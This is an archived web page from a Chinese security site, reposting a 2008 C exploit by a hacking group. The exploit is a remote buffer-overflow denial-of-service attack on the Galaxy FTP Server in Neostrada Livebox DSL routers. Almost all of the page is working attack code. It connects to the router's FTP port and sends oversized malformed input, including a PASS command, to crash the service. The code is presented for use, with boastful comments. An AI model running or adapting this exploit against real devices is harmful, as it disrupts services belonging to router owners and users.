首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) DoS Exploit 来源：http://dark-coders.4rh.eu 作者：0in 发布时间：2008-03-03   /* Discovered bY 0in From DaRk-CodeRs Programming & Security Group! Contact: 0in(dot)email[at]gmail(dot)com HOMEPAGE: http://dark-coders.4rh.eu DESCRIPTION: Livebox router is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service. POC: */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <unistd.h> #include <string.h> int port=21; struct hostent *he; struct sockaddr_in their_addr; int konekt(char *addr) { int sock; he=gethostbyname(addr); if(he==NULL) { printf("Unknow host!\nexiting..."); return -1; } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return -2; } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); if (connect(sock, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); return -1; } return sock; } int main(int argc,char *argv[]) { printf("\n+===============================Yeah======================================+"); printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); printf("\n+= Remote Buffer Overflow DoS Exploit =+"); printf("\n+= bY =+"); printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! =+"); printf("\n+= 0in(dot)email[at]gmail(dot)com =+"); printf("\n+= Please visit: http://dark-coders.4rh.eu =+"); printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+"); printf("\n+= And other friends: MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+"); printf("\n+= Chomzee, AfroPL, Joker186 =+"); printf("\n+===============================Yeah======================================+"); if(argc<2) { printf("\nUse %s [IP]!\n",argv[0]); exit(0); } printf("\nConnecting to:%s...",argv[1]); int sock=konekt(argv[1]); if(sock<0) { printf("\neh..."); exit(0); } printf("\nConnected!!\n"); char rcv[256]; recv(sock,rcv,255,0); printf("\n%s\n",rcv); printf("\nSending evil buffer.."); char evil[100*100]="%n\x01\x02\x03\x04"; int i; for(i=0;i<(100*100)-100;i++) { strcat(evil,"A"); } strcat(evil,"\r\n"); send(sock,evil,strlen(evil),0); strcpy(rcv,""); recv(sock,rcv,255,0); printf("\n%s\n",rcv); char pass[100*1000]="PASS "; strcat(pass,evil); strcat(pass,"\n\r"); send(sock,pass,strlen(pass),0); strcpy(rcv,""); recv(sock,rcv,255,0); printf("\n%s\n",rcv); printf("\nOK!\nYou're Livebox FTP server should fucked out..."); exit(0); }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Symantec BackupExec Calendar C ·千千静听 med 文件格式堆溢出 ·Centreon <= 1.4.2.3 (get_image ·EazyPortal <= 1.0 (COOKIE) Rem ·MiniWebSvr 0.0.9a Remote Direc ·D-Link MPEG4 SHM Audio Control ·ICQ Toolbar 2.3 ActiveX Remote ·Nukedit 4.9.x Remote Create Ad ·zKup CMS 2.0 <= 2.3 Remote Add ·Apple Mac OS X xnu <= 1228.3.1 ·zKup CMS 2.0 <= 2.3 Remote Upl ·Move Networks Quantum Streamin   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved